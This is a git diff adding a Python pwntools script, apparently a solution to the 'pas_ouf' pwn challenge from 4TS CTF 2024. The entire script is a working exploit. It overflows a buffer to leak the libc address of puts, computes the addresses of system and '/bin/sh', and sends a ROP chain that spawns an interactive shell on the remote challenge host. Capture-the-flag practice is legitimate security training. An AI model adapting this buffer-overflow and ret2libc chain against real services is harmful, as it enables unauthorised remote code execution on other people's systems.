diff --git a/4ts_ctf_2024/pas_ouf/b.py b/4ts_ctf_2024/pas_ouf/b.py
new file mode 100644
index 0000000..7f00254
--- /dev/null
+++ b/4ts_ctf_2024/pas_ouf/b.py
@@ -0,0 +1,41 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn-pas-ouf", checksec=False)
+# r = process()
+r = process("openssl s_client -quiet -verify_quiet -connect main-5000-pwn-pas-ouf-70df26172a24b94f.ctf.4ts.fr:52525", shell=True)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# buf
+buf = b"A"*272
+buf += p64(0x404118)
+buf += p64(0x40129e)
+buf += b"A"*280
+buf += p64(target.sym.main)
+s(buf)
+
+# leak
+r.recvuntil(b"@\n")
+puts = u64(r.recv(6).ljust(8, b"\x00"))
+log.info("puts: %#x", puts)
+libc = puts - 0x80e50
+log.info("libc: %#x", libc)
+system = libc + 0x50d70
+sh = libc + 0x1d8678
+
+# gadgets
+pop_rdi = libc + 0x2a3e5
+
+# pop
+buf = b"A"*280
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+s(buf)
+
+r.interactive()
\ No newline at end of file